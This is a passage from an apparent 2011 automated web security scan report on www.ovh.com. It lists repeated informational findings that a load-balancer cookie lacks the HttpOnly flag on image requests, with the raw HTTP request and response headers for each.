Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3502
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.13. http://www.ovh.com/fr/images/index/dom-promo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dom-promo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dom-promo.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f96-39b3-488c36802e316"
Accept-Ranges: bytes
Content-Length: 14771
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 754
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.14. http://www.ovh.com/fr/images/index/dom_bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dom_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dom_bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121fa4-63e4-488c36803a7da"
Accept-Ranges: bytes
Content-Length: 25572
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:23:47 GMT
Age: 2833
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.........................................................e...................................
...[SNIP]...

3.15. http://www.ovh.com/fr/images/index/doms.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/doms.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/doms.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f5a-3f63-488c367fe5d33"
Accept-Ranges: bytes
Content-Length: 16227
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 749
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.16. http://www.ovh.com/fr/images/index/dotafnfcomsbki.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dotafnfcomsbki.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dotafnfcomsbki.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 12 Jan 2011 14:50:19 GMT
ETag: "2aeed0-4135-499a751ede815"
Accept-Ranges: bytes
Content-Length: 16693
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3501
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.17. http://www.ovh.com/fr/images/index/dotco.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dotco.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dotco.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 19 Aug 2010 14:15:29 GMT
ETag: "14dddb-41e2-48e2dd07dc641"
Accept-Ranges: bytes
Content-Length: 16866
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 751
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.18. http://www.ovh.com/fr/images/index/dotdk.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dotdk.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dotdk.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Mon, 11 Oct 2010 15:06:01 GMT
ETag: "1ba549-26c8-49258b2d06a5d"
Accept-Ranges: bytes
Content-Length: 9928
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 754
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.19. http://www.ovh.com/fr/images/index/dotin.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dotin.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dotin.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 16 Sep 2010 15:19:27 GMT
ETag: "218264-3358-49061f8ceb118"
Accept-Ranges: bytes
Content-Length: 13144
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3506
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.20. http://www.ovh.com/fr/images/index/dotla.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dotla.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dotla.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 13 Aug 2010 14:29:39 GMT
ETag: "14a3e1-2b8a-48db5501ec68a"
Accept-Ranges: bytes
Content-Length: 11146
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3506
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.21. http://www.ovh.com/fr/images/index/dotmgms.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dotmgms.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dotmgms.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 10 Dec 2010 18:20:31 GMT
ETag: "23b475-2a13-4971268e5815a"
Accept-Ranges: bytes
Content-Length: 10771
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3501
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.22. http://www.ovh.com/fr/images/index/ent-vid.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/ent-vid.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/ent-vid.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f92-2764-488c36802932e"
Accept-Ranges: bytes
Content-Length: 10084
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3502
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.23. http://www.ovh.com/fr/images/index/fax.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/fax.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/fax.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f6d-2520-488c367ffda83"
Accept-Ranges: bytes
Content-Length: 9504
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3505
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.24. http://www.ovh.com/fr/images/index/hg2010.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/hg2010.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/hg2010.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f7e-3864-488c3680102f8"
Accept-Ranges: bytes
Content-Length: 14436
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 752
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.25. http://www.ovh.com/fr/images/index/housing.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/housing.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/housing.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f9e-2736-488c36803577a"
Accept-Ranges: bytes
Content-Length: 10038
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3506
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.26. http://www.ovh.com/fr/images/index/hybrid.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/hybrid.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/hybrid.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f71-35a0-488c368002e31"
Accept-Ranges: bytes
Content-Length: 13728
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 751
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.27. http://www.ovh.com/fr/images/index/mails.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/mails.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/mails.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f8e-3253-488c36802436c"
Accept-Ranges: bytes
Content-Length: 12883
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 749
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.28. http://www.ovh.com/fr/images/index/minicloud.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/minicloud.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/minicloud.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f73-2ad2-488c3680056f7"
Accept-Ranges: bytes
Content-Length: 10962
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3504
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.29. http://www.ovh.com/fr/images/index/order.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/order.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/order.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f9a-1f5a-488c36803314d"
Accept-Ranges: bytes
Content-Length: 8026
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 771
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.........................................................#.@.................................
...[SNIP]...

3.30. http://www.ovh.com/fr/images/index/pcc.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/pcc.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/pcc.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f60-3917-488c367fedd5d"
Accept-Ranges: bytes
Content-Length: 14615
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 751
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.31. http://www.ovh.com/fr/images/index/renew.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/renew.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/renew.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

